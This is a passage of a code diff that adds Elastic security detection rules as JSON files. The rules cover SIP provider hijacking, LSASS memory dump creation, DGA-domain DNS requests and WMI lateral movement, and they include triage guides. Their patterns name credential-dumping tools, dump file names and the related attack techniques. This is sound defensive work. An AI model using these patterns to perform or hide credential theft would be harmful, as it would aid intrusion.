"Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f28e2be4-6eca-4349-bdd9-381573730c22_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_106.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_106.json new file mode 100644 index 00000000000..4c4a818d1be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_106.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the registered Subject Interface Package (SIP) providers. SIP providers are used by the Windows cryptographic system to validate file signatures on the system. This may be an attempt to bypass signature validation checks or inject code into critical processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SIP Provider Modification", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\"\n ) and\n registry.data.strings:\"*.dll\"\n", + "references": [ + "https://github.com/mattifestation/PoCSubjectInterfacePackage" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.003", + "name": "SIP and Trust Provider Hijacking", + "reference": "https://attack.mitre.org/techniques/T1553/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_107.json b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_107.json new file mode 100644 index 00000000000..eddf94144e6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2c7b914-eda3-40c2-96ac-d23ef91776ca_107.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the registered Subject Interface Package (SIP) providers. SIP providers are used by the Windows cryptographic system to validate file signatures on the system. This may be an attempt to bypass signature validation checks or inject code into critical processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SIP Provider Modification", + "query": "registry where host.os.type == \"windows\" and event.type:\"change\" and\n registry.path: (\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType 0\\\\CryptSIPDllPutSignedDataMsg\\\\{*}\\\\Dll\",\n \"*\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\",\n \"*\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\Trust\\\\FinalPolicy\\\\{*}\\\\$Dll\"\n ) and\n registry.data.strings:\"*.dll\"\n", + "references": [ + "https://github.com/mattifestation/PoCSubjectInterfacePackage" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.003", + "name": "SIP and Trust Provider Hijacking", + "reference": "https://attack.mitre.org/techniques/T1553/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "f2c7b914-eda3-40c2-96ac-d23ef91776ca_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_108.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_108.json new file mode 100644 index 00000000000..9ec7370deb7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_108.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Local Security Authority Subsystem Service (lsass.exe) default memory dump. This may indicate a credential access attempt via trusted system utilities such as Task Manager (taskmgr.exe) and SQL Dumper (sqldumper.exe) or known pentesting tools such as Dumpert and AndrewSpecial.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Memory Dump Creation", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and\n file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\"\n ) and\n file.path : (\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\MSSQL\\\\LOG\\\\SQLDmpr*.mdmp\"\n )\n ) and\n\n not (\n process.executable : \"?:\\\\Windows\\\\system32\\\\WerFault.exe\" and\n file.path : (\n \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\",\n \"?:\\\\Windows\\\\System32\\\\%LOCALAPPDATA%\\\\CrashDumps\\\\lsass.exe.*.dmp\"\n )\n )\n", + "references": [ + "https://github.com/outflanknl/Dumpert", + "https://github.com/hoangprod/AndrewSpecial" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timeline_id": "4d4c0b59-ea83-483f-b8c1-8c360ee53c5c", + "timeline_title": "Comprehensive File Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_109.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_109.json new file mode 100644 index 00000000000..aca304f2811 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_109.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Local Security Authority Subsystem Service (lsass.exe) default memory dump. This may indicate a credential access attempt via trusted system utilities such as Task Manager (taskmgr.exe) and SQL Dumper (sqldumper.exe) or known pentesting tools such as Dumpert and AndrewSpecial.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Memory Dump Creation", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and\n file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\"\n ) and\n file.path : (\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\MSSQL\\\\LOG\\\\SQLDmpr*.mdmp\"\n )\n ) and\n\n not (\n process.executable : \"?:\\\\Windows\\\\system32\\\\WerFault.exe\" and\n file.path : (\n \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\",\n \"?:\\\\Windows\\\\System32\\\\%LOCALAPPDATA%\\\\CrashDumps\\\\lsass.exe.*.dmp\"\n )\n )\n", + "references": [ + "https://github.com/outflanknl/Dumpert", + "https://github.com/hoangprod/AndrewSpecial" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timeline_id": "4d4c0b59-ea83-483f-b8c1-8c360ee53c5c", + "timeline_title": "Comprehensive File Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_3.json b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_3.json new file mode 100644 index 00000000000..d75c188a6cc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_3.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity.", + "from": "now-10m", + "index": [ + "logs-endpoint.events.*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Machine Learning Detected a DNS Request Predicted to be a DGA Domain", + "query": "ml_is_dga.malicious_prediction:1 and not dns.question.registered_domain:avsvmcloud.com\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.registered_domain", + "type": "keyword" + }, + { + "ecs": false, + "name": "ml_is_dga.malicious_prediction", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "f3403393-1fd9-4686-8f6e-596c58bc00b4", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. \n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "f3403393-1fd9-4686-8f6e-596c58bc00b4_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_109.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_109.json new file mode 100644 index 00000000000..bc53c70c18e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_109.json @@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "WMI Incoming Lateral Movement", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\HPWBEM\\\\Tools\\\\hpsum_swdiscovery.exe\",\n \"?:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\mofcomp.exe\",\n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\csc.exe\",\n \"?:\\\\Windows\\\\System32\\\\powercfg.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"REBOOT=ReallySuppress\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\appcmd.exe\" and process.args : \"uninstall\")\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + 